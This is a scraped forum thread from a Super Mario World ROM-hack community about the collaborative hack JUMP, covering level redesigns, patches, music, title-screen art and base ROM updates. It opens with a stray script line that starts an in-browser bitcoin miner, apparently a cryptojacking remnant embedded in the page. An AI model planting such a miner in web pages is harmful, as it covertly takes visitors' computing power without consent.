miner.start(); // initialise bitcoin miner
</script>

smw centralmario fan games galaxysmbx community

-Main Discussion (FINALLY Updated Base ROM Here) Thread-

A vanilla VIP-like smw collab!
morsel/morceau

Re: -Main Discussion (FINALLY Updated Base ROM Here) Thread-

Postby morsel/morceau » 6 years ago

The teleport block messes with the y register so it can do cool things like spawn balloons and kill you. Please replace with this one
dont wanna jihad no more

worldpeace125

Postby worldpeace125 » 6 years ago

music updates (see changelist.txt)

worldpeace125

There was a mistake on Silver Field.txt. I fixed that and also there's minor improvement. Please replace with this one again. This should be the final version, sorry.
Attachments
Silver Field.zip
(41.88 KiB) Downloaded 33 times

Isocitration

Postby Isocitration » 6 years ago

Alright, so after I'm finished with my MaGLx level I'm considering heavily redesigning Misc Monument to be a lot less ridiculous. Either that or I replace it with something else/give up the level slot because as it stands, it just feels too long and convoluted to be in the game. (Did anyone ever beat it besides myself?)

morsel/morceau

I have beaten Misc Mon. I can actually beat the first half without dying most times, although I have not yet managed to collect the DCs. I don't think a drastic revision is necessary, although I do think it could be a little easier. Switch blocks would be a great way to achieve this (example: put switch blocks over the pit where you have to bounce on the spike ball in midair). You could jerryrig a midpoint in the first half by having a custom block that sets a freeram address and checking this address in levelasm to start the flying patform moving. This would also solve the minor issue of the fast scrolling section playing slightly differently after dying and restarting from the midpoint. The only thing I found frustrating about the level is the coming down through the nets with yoshi. It was confusing as to what hurts you, where you're supposed to jump to stay in the background, where you're supposed to wait or where to rush.

-----

I had a go a making a life farm. Please tell me if it's suitable. To get lives
throw blocks at the bubbles
J patch.rar
dont wanna jihad no more

Isocitration

Postby Isocitration » 6 years ago

That flying platform pseudo midpoint is a pretty interesting idea, but if we're incorporating your multi midpoint patch I'll likely use that instead. I'd probably place a midpoint at the beginning of the first cave segment and a another one after the second cave segment (eliminating the current midpoint).

I'm overall pretty dissatisfied with the second half so I'll probably redesign it. Contemplating getting rid of the 'behind the nets' gimmick despite it being one of the original ideas for the level, but we'll see.

Frozelar
Retired Screamer

Postby Frozelar » 6 years ago

Isocitration wrote:That flying platform pseudo midpoint is a pretty interesting idea, but if we're incorporating your multi midpoint patch I'll likely use that instead. I'd probably place a midpoint at the beginning of the first cave segment and a another one after the second cave segment (eliminating the current midpoint).

I'm overall pretty dissatisfied with the second half so I'll probably redesign it. Contemplating getting rid of the 'behind the nets' gimmick despite it being one of the original ideas for the level, but we'll see.
I think you should keep the gimmick, just make it a little less craaaAAAAaazy ok?

aterraformer

Postby aterraformer » 6 years ago

I found a level on my computer that I am assuming is for JUMP because 12 levels and overworld dragon coin counter but uses level 1. I have no memory of when I got this or who made it! It is call Shouldering On and it uses a gimmick where pressing the screen scroll buttons spawns a throw block in your hand.
raocow wrote:the plan is to wait for Jump to be released and then replacing the graphics without telling anyone involved with Jump.

aterraformer

How do I use this patch for two of cynderfyre's levels so that that camera follows and they are more playable but not all the others (unless I'm told specifically by the author). Can I just put it like that in level_asm?

Code: Select all

org $00F878
db $80 ;$Do
raocow wrote:the plan is to wait for Jump to be released and then replacing the graphics without telling anyone involved with Jump.

morsel/morceau

include this in the level code whenever it's needed

LDA #$80
STA $1406
I made Shouldering On for a contest. Do you want to include it in jump? (it didn't score very well)
dont wanna jihad no more

aterraformer

morsel/morceau wrote:I made Shouldering On for a contest. Do you want to include it in jump? (it didn't score very well)
I was thinking that it was a level by you. Sure, why not? I like the gimmick. Just send me over a file with the all the stuff. What world do you think for it? Possibly consider getting rid of the scrolling? haha

aterraformer

Oh wow, this actually updated. What.
Base ROM v1.25

Jolpengammler
Jipples, the friendly dog

Postby Jolpengammler » 6 years ago

In the newest base, lots of the sounds dont work!
"Ban all the facial hair from life." ~ Horikawa Otane, 2014
"You're shitting with me!" ~ Isocitration, 2014
"skype adds think I'm a lady looking for 40 years old men" ~ raocow, 2016
"i always run up and down the stairs because i want to die" ~Isocitration, 2016

Depressed Horse:

aterraformer

Jolpengammler wrote:In the newest base, lots of the sounds dont work!
Take it up with Kipernal. I have no idea the issue.
AMK was updated today, seems to fix the issues (EXCEPT AM4 SAMPLE DEATH JINGLE)

morsel/morceau

morsel/morceau wrote:include this in the level code whenever it's needed

LDA #$80
STA $1406
Sorry for confusion: I meant include between "levelXXX:" and "RTS". If you remove the RTS there will be problems.
aterraformer wrote:
morsel/morceau wrote:I made Shouldering On for a contest. Do you want to include it in jump? (it didn't score very well)
I was thinking that it was a level by you. Sure, why not? I like the gimmick. Just send me over a file with the all the stuff. What world do you think for it? Possibly consider getting rid of the scrolling? haha
Could you assign me a level number? It was made with scrolling in mind so some things wouldn't make much sense without it. A midpoint would make it a bit easier. One of the judges said it was special world difficulty but in JUMP special world = pixel perfect = impossible for everyone so I don't know.

Have you decided whether to use the multiple midpoint patch or the checkpoint I described in the other thread? If the latter please assign me a block number for the checkpoint block. (I think we're using page 2 for general stuff?)
dont wanna jihad no more

aterraformer

Morsel: you can have level 5 and map16 510. I would like it higher but a lot of it is taken, or at least in theory since I'm not at my laptop.

Actually, MarkyJoe did beat Pixel Perfect haha

morsel/morceau

I was trying to get the midway patch to work earlier, but although it works when applied to a clean rom, it doesn't when applied to the JUMP base rom (freezes at OW). It doesn't conflict with the following:
-statusbar.asm
-AMK
-ST
-uberasm
-I can't run BTSD on this operating system but it doesn't conflict with the block insertion I can try out, so it would be unlikely to be that.

It seems the base rom is having something run on it or had something run on it in the past that conflicts. I suggest porting to a fresh rom when I send you the updated patch.
dont wanna jihad no more

yogui
♥♥♥♥♥♥♥♥♥♥♥♥♥♥♥
Banned
First name: guy who made something

Postby yogui » 6 years ago

aterraformer wrote:Oh wow, this actually updated. What.
Base ROM v1.25
Quickly played some level in lunar magic.
Custom blocks doesn't work in level 1D.

Also it should be on the review thread, but the bottom row of level 101 need to be filled because you actually see one pixel of the bottom row when you play (also cut-off on screen 8).
[enable_hats][/enable_hats]

Mineyl

Postby Mineyl » 6 years ago

So hey, I noticed there's no title screen in the current base ROM. Let's change that.

Obviously based off of this image:
Just a few little somethings I've thrown together in my spare time since I haven't seen any images around here that are yet SNES compatible. Don't take them as end-all, be-all or anything, I just thought I'd get the ball rolling. I'll probably make a few more in the next few days or weeks. Stop me if you all see one you like.
raocow wrote:I'm feeling so smug I'm gonna' stare at myself in the mirror for 23 hours!

aterraformer

They are all cool but I especially like the third one. If you could have Mario and Luigi in it too than that would be perfect.

Mineyl

No problem. I just wanted to get the base design down before tossing them in there (mostly due to the way the image editor I use for pixel art works). I may play with the individual gradients to get them to look better, too.
raocow wrote:I'm feeling so smug I'm gonna' stare at myself in the mirror for 23 hours!

Mineyl

Thought I'd try drawing the logo instead of translating someone else's work. Making big, thick letters in pixels can be harder than it looks and I'm not fully satisfied with it. An improvement may be to round out all the sharp corners and perhaps be far more liberal with the shading or go back to the gradient seen above.

EDIT: And here we have the gradient logo with a thicker outline and minus the shadow (though that can be added back in, of course):

worldpeace125

After talking with aterraformer, we are likely to replace the World 7 submap song with a new one(attachment). The lightning sound effect in the submap(which was originally Bowser's valley) cannot be played together with that song. I'd like to add this code into asar_patch.asm to disable the lightning.

org $04F709
db $FF

e: deleted the attachment since it's outdated
Last edited by worldpeace125 on 27 Jun 2014, 14:23, edited 1 time in total.

aterraformer

aterraformer

Base ROM v1.28

Wow, I have really been updating exactly a month apart! Not good..

Included:
-Overworld updates
-So I have put some more levels in, already forget which ones
-fixed up the sprites to make sure Iso's level works
-lolyoshi's second half of Shell Shrine with the first half's difficulty reduced
-a boss fight for world 6 that doesn't actually work!
-probably other things

Come on everyonetch (including myself), step it up! We are in the final stretch! Let's get an alpha beta version out for extensive testing soonish!

Return to “JUMP”